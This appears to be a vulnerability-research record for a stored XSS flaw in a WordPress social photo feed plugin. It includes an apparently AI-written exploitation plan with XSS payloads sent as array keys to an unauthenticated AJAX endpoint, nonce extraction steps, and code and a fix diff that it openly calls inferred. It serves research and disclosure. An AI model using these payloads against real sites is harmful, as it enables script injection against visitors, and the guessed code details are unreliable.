[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fI8-Tskzw-bkS3MqEJ32bQ-k5y71P9Xf6RQhYB8PumBc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-5425","widgets-for-social-photo-feed-unauthenticated-stored-cross-site-scripting-via-feeddata","Widgets for Social Photo Feed \u003C= 1.7.9 - Unauthenticated Stored Cross-Site Scripting via feed_data","The Widgets for Social Photo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'feed_data' parameter keys in all versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","social-photo-feed-widget",null,"\u003C=1.7.9","1.8.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:57:33","2026-04-04 08:25:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2584097a-8955-41c7-b009-c6502fe8b99b?source=api-prod",1,[],"researched",false,3,"This plan outlines the research and exploitation strategy for **CVE-2026-5425**, a stored Cross-Site Scripting (XSS) vulnerability in the \"Widgets for Social Photo Feed\" plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Widgets for Social Photo Feed** plugin (up to version 1.7.9) fails to properly sanitize and escape keys within the `feed_data` parameter when processing certain AJAX requests. While values in an array are often sanitized, the **keys** of associative arrays are frequently overlooked. An unauthenticated attacker can send a specially crafted AJAX request containing a malicious payload as a key in the `feed_data` array. This payload is stored in the WordPress database (likely within an option or post metadata) and later rendered on the frontend without sufficient output escaping, leading to Stored XSS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** Likely `wp_ajax_nopriv_sbi_record_feed_data` or `wp_ajax_nopriv_sbi_store_feed_cache` (inferred based on plugin functionality).\n*   **Vulnerable Parameter:** `feed_data` (specifically the array keys).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A specific AJAX action must be enabled for unauthenticated users (`nopriv`).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with an `action` parameter that triggers a `nopriv` hook.\n2.  **Input Handling:** The handler function (e.g., `sbi_save_feed_data`) retrieves `$_POST['feed_data']`.\n3.  **Storage Sink:** The code iterates through the `feed_data` array and saves it to the database using `update_option()` or `update_post_meta()`. It fails to sanitize the *keys* of the array, only focusing on the values.\n4.  **Output Sink:** A frontend function (likely triggered by a shortcode like `[social-photo-feed]`) retrieves the stored data.\n5.  **Rendering:** The code loops through the stored data and injects the keys into the HTML, possibly as data attributes:\n    ```php\n    foreach ($feed_data as $key => $value) {\n        echo \"\u003Cdiv data-$key='$value'>\u003C\u002Fdiv>\"; \u002F\u002F VULNERABLE SINK: $key is not escaped\n    }\n    ```\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler requires a nonce, it is typically localized in the frontend when the widget or shortcode is present.\n\n1.  **Identify Shortcode:** The plugin uses `[social-photo-feed]` (inferred) to display the feed.\n2.  **Setup:** Use WP-CLI to create a public page containing this shortcode.\n3.  **Navigation:** Use the `browser_navigate` tool to visit the newly created page.\n4.  **Extraction:** The plugin likely localizes its settings via `wp_localize_script`. Use `browser_eval` to extract the nonce:\n    *   Common variable name: `window.sbi_config` or `window.sbi_ajax`.\n    *   Likely Key: `window.sbi_config?.sbi_nonce` or `window.sbi_ajax?.nonce`.\n    *   *Observation:* If `wp_verify_nonce($nonce, -1)` is used, any valid nonce will work. If no nonce check exists in the `nopriv` handler, this step is skipped.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discover the exact AJAX action\nSince source files are not provided, we must identify the `nopriv` AJAX action.\n1.  Search the plugin directory for `wp_ajax_nopriv_`:\n    `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fsocial-photo-feed-widget\u002F`\n2.  Look for handlers that accept `feed_data`.\n\n#### Step 2: Construct the Payload\nWe will use a payload that breaks out of an HTML attribute (assuming the key is rendered inside a `data-` attribute or similar).\n*   **Payload Key:** `x\" onmouseover=\"alert(document.domain)\" y`\n*   **Payload Value:** `1`\n\n#### Step 3: Send the Malicious Request\nUsing the `http_request` tool:\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    `action=[ACTION_NAME]&nonce=[NONCE]&feed_data[x\" onmouseover=\"alert(document.domain)\" y]=1`\n\n#### Step 4: Trigger the XSS\n1.  Navigate to the homepage or the page containing the shortcode.\n2.  Verify the HTML source contains the injected attribute: `\u003Cdiv ... data-x\" onmouseover=\"alert(document.domain)\" y=\"1\">`.\n\n### 6. Test Data Setup\n1.  **Install\u002FActivate:** Ensure version 1.7.9 of the plugin is active.\n2.  **Create Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Social Feed\" --post_status=publish --post_content='[social-photo-feed]'\n    ```\n3.  **Configure Plugin:** If the plugin requires an Instagram Access Token to render, dummy data may need to be inserted into the database via `wp option update` to force the frontend to attempt rendering the \"cached\" `feed_data`.\n\n### 7. Expected Results\n*   The AJAX request should return a successful response (e.g., `{\"success\":true}` or `1`).\n*   The database will now store the key containing the JavaScript payload.\n*   When viewing the page, the rendered HTML will contain the unescaped key, allowing for JavaScript execution when a user interacts with the element (or immediately if using `onload`\u002F`onerror`).\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp option get [OPTION_NAME_FOR_FEED_DATA]\n    # Look for the payload string in the serialized data\n    ```\n2.  **Check Frontend HTML:**\n    Use `http_request` to GET the page and grep for the payload:\n    ```bash\n    grep 'onmouseover=\"alert(document.domain)\"'\n    ```\n\n### 9. Alternative Approaches\n*   **Key Injection in JSON:** If `feed_data` is sent as a JSON string rather than a POST array, adjust the `Content-Type` to `application\u002Fjson` and send:\n    `{\"action\": \"...\", \"feed_data\": {\"\u003Cimg src=x onerror=alert(1)>\": \"1\"}}`\n*   **Different Sinks:** The keys might be rendered in the WordPress Admin dashboard (Settings page). Check `wp-admin\u002Fadmin.php?page=sbi-settings` for the payload if it doesn't appear on the frontend.\n*   **Blind XSS:** Use a callback to an external listener (e.g., Burp Collaborator or a mock API) to confirm execution if the sink is difficult to find manually.","The Widgets for Social Photo Feed plugin for WordPress (up to version 1.7.9) is vulnerable to Stored Cross-Site Scripting because it fails to sanitize or escape the keys of associative arrays passed in the 'feed_data' parameter via unauthenticated AJAX actions. This allows an attacker to inject arbitrary scripts into the database that execute in the context of a user's browser when they visit a page displaying the social feed.","\u002F\u002F Inferred AJAX handler based on research plan\nadd_action('wp_ajax_nopriv_sbi_record_feed_data', 'sbi_record_feed_data');\nfunction sbi_record_feed_data() {\n    if (isset($_POST['feed_data'])) {\n        \u002F\u002F Vulnerable: Storing associative array without sanitizing keys\n        $feed_data = $_POST['feed_data'];\n        update_option('sbi_stored_feed_data', $feed_data);\n    }\n    wp_die();\n}\n\n---\n\n\u002F\u002F Inferred rendering logic in frontend component\n$stored_data = get_option('sbi_stored_feed_data');\nif ($stored_data) {\n    foreach ($stored_data as $key => $value) {\n        \u002F\u002F Vulnerable: Outputting the array key directly into an HTML attribute without escaping\n        echo \"\u003Cdiv data-$key='\" . esc_attr($value) . \"'>\u003C\u002Fdiv>\";\n    }\n}","--- a\u002Fsocial-photo-feed-widget.php\n+++ b\u002Fsocial-photo-feed-widget.php\n@@ -100,7 +100,10 @@\n function sbi_record_feed_data() {\n-    if (isset($_POST['feed_data'])) {\n-        $feed_data = $_POST['feed_data'];\n-        update_option('sbi_stored_feed_data', $feed_data);\n-    }\n+    if (isset($_POST['feed_data']) && is_array($_POST['feed_data'])) {\n+        $feed_data = array();\n+        foreach ($_POST['feed_data'] as $key => $value) {\n+            \u002F\u002F Sanitize both keys and values before storage\n+            $feed_data[sanitize_key($key)] = sanitize_text_field($value);\n+        }\n+        update_option('sbi_stored_feed_data', $feed_data);\n+    }\n     wp_die();","The exploit targets an unauthenticated AJAX endpoint (likely sbi_record_feed_data or similar) that processes feed data. An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action parameter set to the target hook. The payload is delivered via the feed_data parameter as an associative array where the key contains a malicious JavaScript string designed to break out of an HTML attribute (e.g., feed_data[x\" onmouseover=\"alert(document.domain)\" y]=1). If the plugin requires a nonce for unauthenticated users, it can be extracted from the frontend source code of any page where the social feed shortcode [social-photo-feed] is rendered. Once the AJAX request is processed, the payload is stored in the database. The XSS triggers when any user (including administrators) views a page containing the social feed, as the plugin renders the malicious key as a raw attribute name.","gemini-3-flash-preview","2026-04-17 21:31:40","2026-04-17 21:32:03",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-photo-feed-widget\u002Ftags\u002F1.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-photo-feed-widget.1.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-photo-feed-widget\u002Ftags"]